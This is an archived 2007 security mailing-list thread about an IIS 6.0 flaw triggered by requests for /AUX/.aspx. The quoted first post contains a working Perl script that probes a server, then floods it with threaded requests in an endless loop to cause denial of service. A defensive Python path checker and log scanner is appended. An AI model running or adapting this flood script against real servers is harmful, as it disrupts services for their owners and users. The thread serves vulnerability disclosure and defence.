Message-ID: <231008201.20070523135356@SECURITY.NNOV.RU>
Date: Wed, 23 May 2007 13:53:56 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "kingcope" <kingcope@....net>
Cc: 'Full-Disclosure' <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as a local unauthorized access or privilege escalation, to execute a
user-supplied .aspx script from a COM port (via serial cable) without
having console access, with the permissions of the Web application.
IWAM_%COMPUTERNAME% is the default, but it's often elevated for application
pools for different reasons.

Needs to be tested, though.

The same vulnerability existed in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to 3APA3A@...URITY.NNOV.RU:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS, it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -----Original Message-----
k> From: 3APA3A [mailto:3APA3A@...URITY.NNOV.RU] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; bugtraq@...urityfocus.com
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of DoS impact, because it allows an attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from a device attached to COM1 or prevent another application
k> from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@...ts.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:

k>> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k>> #/AUX/.aspx the server gets unstable and non responsive. This happens only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope kingcope@....net
k>>
k>> ##########################################################################
k>>
k>> ###***********************************************************************
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>>
k>> ##########################################################################

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                               PeerPort => 'http(80)',
k>>                               Proto    => 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>> 	if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>> 			$k=1;
k>> 			last;
k>> 	}
k>> }

k>> if ($k==0) {
k>> 	print "Server does not seem vulnerable to this attack.\n";
k>> 	exit;	
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>> 	$thr = threads->new(\&sendit);
k>> 	print "\r\r\r$i/100                        ";
k>> }

k>> foreach $thr (threads->list) {
k>> 	$thr->join;
k>> }
k>> }


k>> _______________________________________________
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/

-- 
~/ZARAZA http://securityvulns.com/
Thus he dies for the sixth time - and again in a new place. (Twain)
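The thread's point on the defensive side is that the IIS path check caught /AUX.aspx but not a device name used as a directory segment (/AUX/.aspx). The following is an added example, not code from this thread or from Microsoft: a Python checker that flags any path segment naming a Windows reserved device, and a scanner that runs it over constructed IIS-style log lines (the field layout and the log lines are assumptions made up here).

```python
import re
from urllib.parse import unquote

# Windows reserved device names: CON, PRN, AUX, NUL, COM1-9, LPT1-9
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})

def reserved_device_segment(path):
    """Return the first path segment that names a reserved device, else None.

    Every segment is checked, not only the final file name, so a device name
    used as a directory (the /AUX/.aspx case in the thread) is caught as well
    as /AUX.aspx. Win32 maps "AUX.ext" to AUX and ignores trailing dots and
    spaces, so the comparison uses the part before the first dot, with
    trailing dots/spaces stripped, case-insensitively. Percent-encoding is
    decoded first so /%41%55%58.aspx is treated like /AUX.aspx.
    """
    decoded = unquote(path.split("?", 1)[0])
    for segment in re.split(r"[\\/]+", decoded):
        base = segment.split(".", 1)[0].rstrip(". ").upper()
        if base in RESERVED:
            return segment
    return None

def scan_iis_log(lines):
    """Flag requests in W3C-style log lines whose URI stem hits a device name."""
    hits = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        # Assumed field layout: date time c-ip cs-method cs-uri-stem sc-status
        if len(fields) < 6:
            continue
        segment = reserved_device_segment(fields[4])
        if segment is not None:
            hits.append((fields[2], fields[4], segment))
    return hits

# Constructed sample log lines (not taken from the original post)
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2007-05-22 09:10:08 192.0.2.10 GET /AUX/.aspx 500
2007-05-22 09:10:09 192.0.2.10 GET /default.aspx 200
2007-05-22 09:10:10 192.0.2.11 GET /images/com1.gif 404
2007-05-22 09:10:11 192.0.2.12 GET /%41%55%58.aspx 500
2007-05-22 09:10:12 192.0.2.13 GET /auxiliary/index.aspx 200
""".splitlines()

if __name__ == "__main__":
    for ip, uri, segment in scan_iis_log(SAMPLE_LOG):
        print(f"{ip} requested {uri!r}: reserved device segment {segment!r}")
```

The same `reserved_device_segment` check can sit in front of any file-system mapping of request paths on Windows, rejecting the request before the path ever reaches the Win32 layer.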
